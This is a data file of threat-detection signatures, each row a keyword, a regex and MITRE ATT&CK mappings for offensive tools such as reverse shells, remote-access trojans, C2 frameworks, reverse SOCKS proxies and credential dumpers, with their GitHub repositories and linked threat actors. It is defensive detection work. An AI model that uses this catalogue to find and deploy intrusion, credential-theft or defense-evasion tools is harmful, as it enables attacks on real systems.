"*Retrieve password for the account arobbins in the domain testlab*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sarobbins\sin\sthe\sdomain\stestlab.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57216"
"*Retrieve password for the account jkohler in your current domain*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sjkohler\sin\syour\scurrent\sdomain.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57217"
"*Retrieve password for the account jkohler in your current domain*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sjkohler\sin\syour\scurrent\sdomain.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57218"
"*Retrieve Wdigest credentials from registry*",".{0,1000}Retrieve\sWdigest\scredentials\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57219"
"*returnvar/wce*",".{0,1000}returnvar\/wce.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","57220"
"*return-wizard-rce-exim.txt*",".{0,1000}return\-wizard\-rce\-exim\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","57221"
"*rev_kali_192_168_0_110_1234*",".{0,1000}rev_kali_192_168_0_110_1234.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","57222"
"*reveng007/C2_Server*",".{0,1000}reveng007\/C2_Server.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","57223"
"*reveng007/DarkWidow*",".{0,1000}reveng007\/DarkWidow.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","57224"
"*reveng007/Executable_Files*",".{0,1000}reveng007\/Executable_Files.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","57225"
"*reveng007/ReflectiveNtdll*",".{0,1000}reveng007\/ReflectiveNtdll.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","57226"
"*reveng007/SharpGmailC2*",".{0,1000}reveng007\/SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","57227"
"*Revenge-RAT v.0.1.exe*",".{0,1000}Revenge\-RAT\sv\.0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57228"
"*Revenge-RAT v.0.2.exe*",".{0,1000}Revenge\-RAT\sv\.0\.2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57229"
"*Revenge-RAT v.0.3.exe*",".{0,1000}Revenge\-RAT\sv\.0\.3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57230"
"*Revenge-RAT v0.1.exe*",".{0,1000}Revenge\-RAT\sv0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57231"
"*Revenge-RAT v0.2.exe*",".{0,1000}Revenge\-RAT\sv0\.2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57232"
"*Revenge-RAT v0.3.exe*",".{0,1000}Revenge\-RAT\sv0\.3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57233"
"*RevengeRAT-Stub-CSsharp*",".{0,1000}RevengeRAT\-Stub\-CSsharp.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT  Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","1","N/A","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","57234"
"*reverse_shell_https.ps1*",".{0,1000}reverse_shell_https\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","57237"
"*reverse_shell_minified.js*",".{0,1000}reverse_shell_minified\.js.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","57238"
"*reverse_tcp_x64.rb*",".{0,1000}reverse_tcp_x64\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57239"
"*reverse_win_http.rb*",".{0,1000}reverse_win_http\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57240"
"*reverseDisableWinDef.cpp*",".{0,1000}reverseDisableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","57241"
"*ReverseProxy.dll*",".{0,1000}ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","57242"
"*ReverseShell.ps1*",".{0,1000}ReverseShell\.ps1.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","57243"
"*ReverseShell_20*.ps1*",".{0,1000}ReverseShell_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","57244"
"*ReverseSock5Proxy/releases/download/*",".{0,1000}ReverseSock5Proxy\/releases\/download\/.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","57245"
"*ReverseSocksProxyHandler.py*",".{0,1000}ReverseSocksProxyHandler\.py.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","57246"
"*reverse-ssh *@*",".{0,1000}reverse\-ssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57247"
"*reverse-ssh -p*",".{0,1000}reverse\-ssh\s\-p.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57248"
"*reverse-ssh -v*",".{0,1000}reverse\-ssh\s\-v.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57249"
"*reverse-ssh.exe*",".{0,1000}reverse\-ssh\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57250"
"*reverse-ssh/releases/latest*",".{0,1000}reverse\-ssh\/releases\/latest.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57251"
"*reverse-sshx64.exe*",".{0,1000}reverse\-sshx64\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57252"
"*reverse-sshx86.exe*",".{0,1000}reverse\-sshx86\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57253"
"*ReverseTCP.ps1*",".{0,1000}ReverseTCP\.ps1.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","57254"
"*ReverseTCPShell-main*",".{0,1000}ReverseTCPShell\-main.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","57255"
"*ReversingID/Shellcode-Loader*",".{0,1000}ReversingID\/Shellcode\-Loader.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","57256"
"*reverst *--tunnel-address *",".{0,1000}reverst\s.{0,1000}\-\-tunnel\-address\s.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57257"
"*REVERST_CERTIFICATE_PATH*",".{0,1000}REVERST_CERTIFICATE_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57258"
"*REVERST_LOG*",".{0,1000}REVERST_LOG.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57259"
"*REVERST_PRIVATE_KEY_PATH*",".{0,1000}REVERST_PRIVATE_KEY_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57260"
"*REVERST_SERVER_NAME*",".{0,1000}REVERST_SERVER_NAME.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57261"
"*REVERST_TUNNEL_ADDRESS*",".{0,1000}REVERST_TUNNEL_ADDRESS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57262"
"*REVERST_TUNNEL_GROUPS*",".{0,1000}REVERST_TUNNEL_GROUPS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57263"
"*RevertToSelf was successful*",".{0,1000}RevertToSelf\swas\ssuccessful.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","57264"
"*Revoke-Obfuscation*",".{0,1000}Revoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","N/A","8","735","123","2023-12-01T02:04:51Z","2017-07-11T01:20:48Z","57265"
"*revsockaddr.sin_addr.s_addr = inet_addr(*",".{0,1000}revsockaddr\.sin_addr\.s_addr\s\=\sinet_addr\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57266"
"*revsocks - reverse socks5 server/client*",".{0,1000}revsocks\s\-\sreverse\ssocks5\sserver\/client.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57267"
"*revsocks -connect*",".{0,1000}revsocks\s\-connect.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57268"
"*revsocks -dns*",".{0,1000}revsocks\s\-dns.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57269"
"*revsocks -listen*",".{0,1000}revsocks\s\-listen.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57270"
"*revsocks_darwin_amd64*",".{0,1000}revsocks_darwin_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57271"
"*revsocks_freebsd_386*",".{0,1000}revsocks_freebsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57272"
"*revsocks_freebsd_amd64*",".{0,1000}revsocks_freebsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57273"
"*revsocks_freebsd_arm*",".{0,1000}revsocks_freebsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57274"
"*revsocks_linux_386*",".{0,1000}revsocks_linux_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57275"
"*revsocks_linux_amd64*",".{0,1000}revsocks_linux_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57276"
